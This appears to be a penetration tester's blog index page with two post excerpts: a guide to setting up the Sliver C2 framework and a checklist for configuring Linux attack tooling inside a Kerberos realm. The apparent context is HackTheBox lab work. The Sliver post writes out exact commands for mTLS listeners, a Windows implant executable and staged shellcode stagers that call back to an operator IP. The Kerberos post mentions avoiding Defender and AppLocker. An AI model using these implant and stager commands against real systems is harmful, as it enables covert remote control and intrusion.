<!DOCTYPE html><html lang="en" class="no-js"><head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://syanide-.github.io/writeups/blog/">
      
      
        <link rel="prev" href="..">
      
      
        <link rel="next" href="archive/2025/">
      
      
        
      
      
        <link rel="alternate" type="application/rss+xml" title="RSS feed" href="../feed_rss_created.xml">
        <link rel="alternate" type="application/rss+xml" title="RSS feed of updated content" href="../feed_rss_updated.xml">
      
      <link rel="icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.0">
    
    
      
        <title>Blog - SYANiDE-.github.io writeups</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/main.618322db.min.css">
      
        
        <link rel="stylesheet" href="../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&amp;display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../css/app.css">
    
      <link rel="stylesheet" href="../css/terminal-player.css">
    
      <link rel="stylesheet" href="../css/asciinema-player.css">
    
      <link rel="stylesheet" href="../assets/stylesheets/panzoom.css">
    
    <script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  <link href="../assets/stylesheets/glightbox.min.css" rel="stylesheet"><script src="../assets/javascripts/glightbox.min.js"></script><style id="glightbox-style">
            html.glightbox-open { overflow: initial; height: 100%; }
            .gslide-title { margin-top: 0px; user-select: text; }
            .gslide-desc { color: #666; user-select: text; }
            .gslide-image img { background: white; }
            .gscrollbar-fixer { padding-right: 15px; }
            .gdesc-inner { font-size: 0.75rem; }
            body[data-md-color-scheme="slate"] .gdesc-inner { background: var(--md-default-bg-color); }
            body[data-md-color-scheme="slate"] .gslide-title { color: var(--md-default-fg-color); }
            body[data-md-color-scheme="slate"] .gslide-desc { color: var(--md-default-fg-color); }
        </style><meta name="panzoom-theme" content="material">
<meta name="panzoom-data" content='{"selectors": [".d2", ".mermaid"], "initial_zoom_level": 1.0}'> </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="deep-orange">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#blog" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href=".." title="SYANiDE-.github.io writeups" class="md-header__button md-logo" aria-label="SYANiDE-.github.io writeups" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"></path></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"></path></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            SYANiDE-.github.io writeups
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Blog
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="deep-orange" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 2a7 7 0 0 0-7 7c0 2.38 1.19 4.47 3 5.74V17a1 1 0 0 0 1 1h6a1 1 0 0 0 1-1v-2.26c1.81-1.27 3-3.36 3-5.74a7 7 0 0 0-7-7M9 21a1 1 0 0 0 1 1h4a1 1 0 0 0 1-1v-1H9z"></path></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="deep-orange" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 2a7 7 0 0 1 7 7c0 2.38-1.19 4.47-3 5.74V17a1 1 0 0 1-1 1H9a1 1 0 0 1-1-1v-2.26C6.19 13.47 5 11.38 5 9a7 7 0 0 1 7-7M9 21v-1h6v1a1 1 0 0 1-1 1h-4a1 1 0 0 1-1-1m3-17a5 5 0 0 0-5 5c0 2.05 1.23 3.81 3 4.58V16h4v-2.42c1.77-.77 3-2.53 3-4.58a5 5 0 0 0-5-5"></path></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"></path></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"></path></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"></path></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
          <a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
            
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"></path></svg>
          </a>
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href=".." class="md-tabs__link">
        
  
  
    
  
  About

      </a>
    </li>
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="./" class="md-tabs__link">
          
  
  
    
  
  Blog

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      
  
  
  
  
    
    
      
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../writeups/HackTheBox/Machines/Breach/" class="md-tabs__link">
          
  
  
    
  
  Writeups

        </a>
      </li>
    
  

    
  

    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


  

<nav class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href=".." title="SYANiDE-.github.io writeups" class="md-nav__button md-logo" aria-label="SYANiDE-.github.io writeups" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"></path></svg>

    </a>
    SYANiDE-.github.io writeups
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href=".." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    About
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
      
        
          
        
      
        
      
    
    
    
      
        
        
      
      
    
    
      
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <div class="md-nav__link md-nav__container">
            <a href="./" class="md-nav__link md-nav__link--active">
              
  
  
  <span class="md-ellipsis">
    
  
    Blog
  

    
  </span>
  
  

            </a>
            
              
              <label class="md-nav__link md-nav__link--active" for="__nav_2" id="__nav_2_label" tabindex="">
                <span class="md-nav__icon md-icon"></span>
              </label>
            
          </div>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            
  
    Blog
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
              
                
  
  
  
  
    
    
      
        
      
    
    
    
      
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="archive/2025/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    
  
    Archive
  

    
  </span>
  
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
    
    
    
      
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    
  
  
  
    
  
  
  
    <a href="../writeups/HackTheBox/Machines/Breach/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    
  
    Writeups
  

    
  </span>
  
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

  

  

      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          
  <div class="md-content" data-md-component="content">
    <div class="md-content__inner">
      <header class="md-typeset">
        <h1 id="blog">Blog<a class="headerlink" href="#blog" title="Permanent link">¶</a></h1>
      </header>
      
        <article class="md-post md-post--excerpt">
  <header class="md-post__header">
    
    <div class="md-post__meta md-meta">
      <ul class="md-meta__list">
        <li class="md-meta__item">
          <time datetime="2025-11-18 00:00:00+00:00">November 18, 2025</time></li>
        
        
          
          <li class="md-meta__item">
            
              3 min read
            
          </li>
        
        
      </ul>
      
    </div>
  </header>
  <div class="md-post__content md-typeset">
    <h2 id="sliver-c2"><a class="toclink" href="2025/11/18/sliver-c2/">Sliver C2</a></h2>
<p>I use both <code>sliver-server</code> and <code>sliver-client</code>.  This way if a connection bugs out on me or accidentally blocks waiting for <code>stdin</code>, I can just nuke the borked instance of <code>sliver-client</code> and start a new one.   Plus I can have multiple instances of <code>multiplayer</code>ed <code>sliver-client</code> teaming on the same session.</p>
<p>The way I like to use <code>sliver</code> is mainly sessions. If I'm working in shellcode, I have a number of delivery mechanisms, but I tend to gravitate toward staged payloads.</p>
<p>I document here generally how I stand up <code>sliver</code>, as reference for writeups, rather than have to verbosely document in every writeup involving an engagement where I do use <code>sliver</code>.</p>
<h3 id="getting-set-up"><a class="toclink" href="2025/11/18/sliver-c2/#getting-set-up">Getting set up</a></h3>
<p>Start a <code>sliver-server</code> instance, and enable <code>multiplayer</code> so <code>sliver-client</code> instances can connect to it.</p>
<div class="highlight"><pre><span></span><code>sliver-server
multiplayer
</code></pre></div>
<p><img alt="Pasted_image_20251118215603.png" src="../Pasted_image_20251118215603.png"></p>
<p>Need to generate an <code>operator</code> profile, this is a profile that will be imported by <code>sliver-client</code> that tells it how to connect to <code>sliver-server</code>.</p>
<div class="highlight"><pre><span></span><code>[server] sliver &gt; new-operator --lhost 10.10.16.59 --save duff59 --name duff59
</code></pre></div>
<p><img alt="Pasted_image_20251118215817.png" src="../Pasted_image_20251118215817.png"></p>
<p>Right about now, import the profile into <code>sliver-client</code> and connect</p>
<div class="highlight"><pre><span></span><code>sliver-client import duff59
sliver-client
(select 10.10.16.59)
</code></pre></div>
<p><img alt="Pasted_image_20251118221343.png" src="../Pasted_image_20251118221343.png"></p>
<h3 id="a-windows-implant-example"><a class="toclink" href="2025/11/18/sliver-c2/#a-windows-implant-example">A Windows implant example</a></h3>
<p>A maybe basic example might be to create an implant that can be dropped on-host.  I am preferential to the <code>mtls</code> variety of listener, so I will stand up an <code>mtls</code> listener and generate a new implant.  By default the <code>mtls</code> listener will listen on port <code>8888</code>.</p>
<div class="highlight"><pre><span></span><code>sliver &gt; mtls --timeout 240
sliver &gt; generate --skip-symbols --disable-sgn --timeout 240 --mtls 10.10.16.59:8888 --arch amd64 --os windows --reconnect 60 --format exe --save a.exe
</code></pre></div>
<p><img alt="Pasted_image_20251118223227.png" src="../Pasted_image_20251118223227.png"></p>
<h3 id="a-windows-staged-implant-example"><a class="toclink" href="2025/11/18/sliver-c2/#a-windows-staged-implant-example">A Windows staged implant example</a></h3>
<p>With a staged implant, the name of the game is shellcode.  So I define a profile for the second stage.  I assign the profile a name like <code>duff59</code></p>
<div class="highlight"><pre><span></span><code>sliver &gt; profiles new --mtls 10.10.16.59 --os windows --arch amd64 --skip-symbols --format shellcode duff59
</code></pre></div>
<p><img alt="Pasted_image_20251118224031.png" src="../Pasted_image_20251118224031.png"></p>
<p>I would still need a listener for second stage to connect to, again I like to use <code>mtls</code>.  This setup also requires having a <code>stage listener</code>, which the first stage will connect to to retrieve the second stage.  The <code>stage listener</code> will listen on port <code>8443</code> in this example</p>
<div class="highlight"><pre><span></span><code>sliver &gt; mtls --timeout 240
sliver &gt; stage-listener --url tcp://10.10.16.59:8443 --profile duff59
</code></pre></div>
<p><img alt="Pasted_image_20251118224628.png" src="../Pasted_image_20251118224628.png"></p>
<p>Finally, generate the first-stage shellcode.  I like to use my own encryption helpers and decryption stubs, depending on the delivery method.</p>
<div class="highlight"><pre><span></span><code>sliver &gt; generate stager --lhost 10.10.16.59 --lport 8443 --os windows --arch amd64 --timeout 240 --format raw --save b.bin
</code></pre></div>
<p><img alt="Pasted_image_20251118225545.png" src="../Pasted_image_20251118225545.png"></p>
<h3 id="staged-linux-implant"><a class="toclink" href="2025/11/18/sliver-c2/#staged-linux-implant">Staged Linux implant</a></h3>
<p>A staged implant for Linux is basically the same thing, only the <code>--os</code> would be <code>linux</code>.</p>
    
    
  </div>
</article>
      
        <article class="md-post md-post--excerpt">
  <header class="md-post__header">
    
    <div class="md-post__meta md-meta">
      <ul class="md-meta__list">
        <li class="md-meta__item">
          <time datetime="2025-11-13 00:00:00+00:00">November 13, 2025</time></li>
        
        
          
          <li class="md-meta__item">
            
              4 min read
            
          </li>
        
        
      </ul>
      
    </div>
  </header>
  <div class="md-post__content md-typeset">
    <h2 id="how-i-operate-within-a-kerberos-realm"><a class="toclink" href="2025/11/13/how-i-operate-within-a-kerberos-realm/">How I operate within a Kerberos Realm</a></h2>
<p>When I am working in a Kerberos realm, there are a few things I do as a collection of standard procedure on any given engagement.</p>
<ol>
<li><code>/etc/hosts</code>: Add hostname mappings to IPs, and for DCs, explode every component of the DCs FQDN and associate it to the IP of the domain controller</li>
<li><code>/etc/resolv.conf</code>: map the <code>domain</code> and <code>nameserver</code> entries to the primary domain and DC </li>
<li><code>/etc/krb5.conf</code>: Generate a new <code>krb5.conf</code>, I have a utility I wrote that generates a new one</li>
<li>timesync with the DC I am working with (at any given time).</li>
</ol>
<p>These steps enable <code>linux</code> toolchains that are designed to work within a Kerberos realm, such as (just to name a few):</p>
<ul>
<li><a href="https://github.com/fortra/impacket">impacket</a></li>
<li><a href="https://github.com/CravateRouge/bloodyAD">bloodyAD</a></li>
<li><a href="https://github.com/aniqfakhrul/powerview.py">powerview.py</a></li>
<li><a href="https://github.com/dirkjanm/BloodHound.py/tree/master">bloodhound-python</a> / <a href="https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce">bloodhound-ce-python</a></li>
<li>many, many others</li>
</ul>
<p>There are many advantages to working from a primarily <code>linux</code>-based workflow, such as avoiding dropping files on disk (i.e., <code>mimikatz</code>, <code>rubeus.exe</code>,<code>certify</code> etc.), avoiding <code>applocker</code> policies or <code>Defender</code>, wonky shells, etc.  </p>
<h3 id="etchosts"><a class="toclink" href="2025/11/13/how-i-operate-within-a-kerberos-realm/#etchosts">/etc/hosts</a></h3>
<p>Host entries in <code>/etc/hosts</code> should follow a pattern of most-descriptive to least-descriptive.  For example, a domain controller that serves as KDC for the realm would have a host entry like follows:</p>
<div class="highlight"><pre><span></span><code>10.1.2.3 dc1.example.com example.com example dc1
</code></pre></div>
<p>Some tools and some protocols may only send part or all of the FQDN, an entry like above ensures that no matter the format of the request, the IP is the one that handles the request for that realm.</p>
<h3 id="etcresolvconf"><a class="toclink" href="2025/11/13/how-i-operate-within-a-kerberos-realm/#etcresolvconf">/etc/resolv.conf</a></h3>
<p>Consult the <a href="https://man7.org/linux/man-pages/man5/resolv.conf.5.html">manpage</a> or, a slightly more humanized conversation around <a href="https://www.baeldung.com/linux/etc-resolv-conf-file">resolv.conf usage</a></p>
<p>But two entries I like to use as a baseline are the <code>nameserver</code> and <code>search</code> configuration options, and typically I will make these entries the topmost entries above all others so that they are preferred:</p>
<div class="highlight"><pre><span></span><code>search example.com
nameserver 10.1.2.3
</code></pre></div>
<h3 id="etckrb5conf"><a class="toclink" href="2025/11/13/how-i-operate-within-a-kerberos-realm/#etckrb5conf">/etc/krb5.conf</a></h3>
<p>I have a <a href="https://github.com/SYANiDE-/make_krb5.conf">utility I wrote</a> for quickly building out the <code>/etc/krb5.conf</code>.  Automate the boring they say. </p>
<p>The <code>-d</code> option can take a comma-delimited list of DC FQDNs, which is useful in cases where you need your <code>krb5.conf</code> to handle multiple realms.  The first DC specified in the list will be the default realm.</p>
<p>Example:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>make_krb5.conf.py<span class="w"> </span>-d<span class="w"> </span>dc1.example.com,dc4.dev.example.com,dc2.engineering.example.com<span class="w"> </span>-w
</code></pre></div>
<p>Generates and writes a new <code>/etc/krb5.conf</code> like so:</p>
<div class="highlight"><pre><span></span><code>kdc = FILE:/var/log/krb5_kdc.log
admin-server = FILE:/var/log/krb5_admin-server.log
default = FILE:/var/log/krb5_default.log

[libdefaults]
        default_realm = EXAMPLE.COM
        dns_lookup_realm = false
        dns_lookup_kdc = false
        # dns_uri_lookup = false  ## use this when trying to troubleshoot
# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
        fcc-mit-ticketflags = true

[realms]
    EXAMPLE.COM = {
        kdc = dc1.example.com:88
        admin_server = dc1.example.com
        password_server = dc1.example.com
        default_domain = example.com
    }        
    DEV.EXAMPLE.COM = {
        kdc = dc4.dev.example.com:88
        admin_server = dc4.dev.example.com
        password_server = dc4.dev.example.com
        default_domain = dev.example.com
    }        
    ENGINEERING.EXAMPLE.COM = {
        kdc = dc2.engineering.example.com:88
        admin_server = dc2.engineering.example.com
        password_server = dc2.engineering.example.com
        default_domain = engineering.example.com
    }        

[domain_realm]
    example.com = EXAMPLE.COM
    .example.com = EXAMPLE.COM        
    dev.example.com = DEV.EXAMPLE.COM
    .dev.example.com = DEV.EXAMPLE.COM        
    engineering.example.com = ENGINEERING.EXAMPLE.COM
    .engineering.example.com = ENGINEERING.EXAMPLE.COM                

[+] Writing /etc/krb5.conf
</code></pre></div>
<h3 id="timesync-with-a-dc"><a class="toclink" href="2025/11/13/how-i-operate-within-a-kerberos-realm/#timesync-with-a-dc">timesync with a DC</a></h3>
<p>Anyone that has ever tried to authenticate to a DC using Kerberos, and the DC is in a different time zone, knows of the pain and struggle:</p>
<p>Example:</p>
<div class="highlight"><pre><span></span><code>┌──<span class="o">(</span>notroot㉿elysium<span class="o">)</span>-<span class="o">[(</span>master<span class="o">)</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>~/htb/machines/hercules<span class="o">]</span>
└─$<span class="w"> </span>impacket-getTGT<span class="w"> </span>example.com/g.oldie:<span class="s1">'RuffigeKru#2'</span>
Impacket<span class="w"> </span>v0.13.0.dev0<span class="w"> </span>-<span class="w"> </span>Copyright<span class="w"> </span>Fortra,<span class="w"> </span>LLC<span class="w"> </span>and<span class="w"> </span>its<span class="w"> </span>affiliated<span class="w"> </span>companies<span class="w"> </span>

Kerberos<span class="w"> </span>SessionError:<span class="w"> </span>KRB_AP_ERR_SKEW<span class="o">(</span>Clock<span class="w"> </span>skew<span class="w"> </span>too<span class="w"> </span>great<span class="o">)</span>
</code></pre></div>
<p>Now normally, we would just disable <code>ntpd</code> :</p>
<div class="highlight"><pre><span></span><code>## one of the following, depending on what controls you
sudo timedatectl set-ntp false
sudo systemctl stop ntp.service
</code></pre></div>
<p>and sync the time with the DC using <code>ntpdate</code>:
</p><div class="highlight"><pre><span></span><code>sudo ntpdate -u dc.example.com
</code></pre></div><p></p>
<p>However in my case, none of this works like above, because my Kali instance is in <code>Virtualbox</code>, and it is the one in control of time syncronization.  </p>
<p>Its a little nuanced.  The short of it is that <code>virtualbox-guest-utils</code> service (systemd) is the one that calls  <code>/usr/sbin/VBoxService</code>, which handles (among a lot Guest Utils things), keeping the Guest OS time syncronized to the Host OS hypervisor.  I do need Guest Utils things, in fact all of them, with the exception of timesync (on these hacking Kerberos realm occasions).</p>
<p>The service binary <code>/usr/sbin/VBoxService</code> can actually be called with an argument that disables time syncronization, but there is not interface for/to it through the <code>systemd</code> wrapper around it, or the init file that starts it.  You can't call <code>virtualbox-guest-utils</code> with any meaningful argument/environment variable to get passed to it being started, and there's no way of controlling the flag at the systemd unit.  </p>
<p>So what I did was come up with another unit file, and some modifications to the init file, so that Guest Utils can be kept running but without time syncronization.  That way just the time syncronization could be toggled.</p>
<p>Fully documented and repeatable <a href="https://github.com/SYANiDE-/tooling/tree/main/vbox-disable-timesync">here</a></p>
<p>But basically with it, I can (effectively) disable just the timesync to the Host OS by starting the new service, then perform an <code>ntpdate -u [otherdomain]</code> as normal, and time synced to the otherdomain persists until reboot (or the service is stopped, forcing the real <code>virtualbox-guest-utils</code> to start again).</p>
<div class="highlight"><pre><span></span><code><span class="c1">## decouple from VBox timesync</span>
sudo<span class="w"> </span>systemctl<span class="w"> </span>start<span class="w"> </span>vbox-disable-timesync.service
sudo<span class="w"> </span>ntpdate<span class="w"> </span>-u<span class="w"> </span>dc1.example.com

<span class="c1">## recouple</span>
sudo<span class="w"> </span>systemctl<span class="w"> </span>stop<span class="w"> </span>vbox-disable-timesync.service
</code></pre></div>
    
    
  </div>
</article>
      
      
        
          



<nav class="md-pagination">
  
</nav>
        
      
    </div>
  </div>

          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"></path></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
        
<div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://github.com/SYANiDE-" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 7.1.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path d="M173.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M252.8 8C114.1 8 8 113.3 8 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C436.2 457.8 504 362.9 504 252 504 113.3 391.5 8 252.8 8M105.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 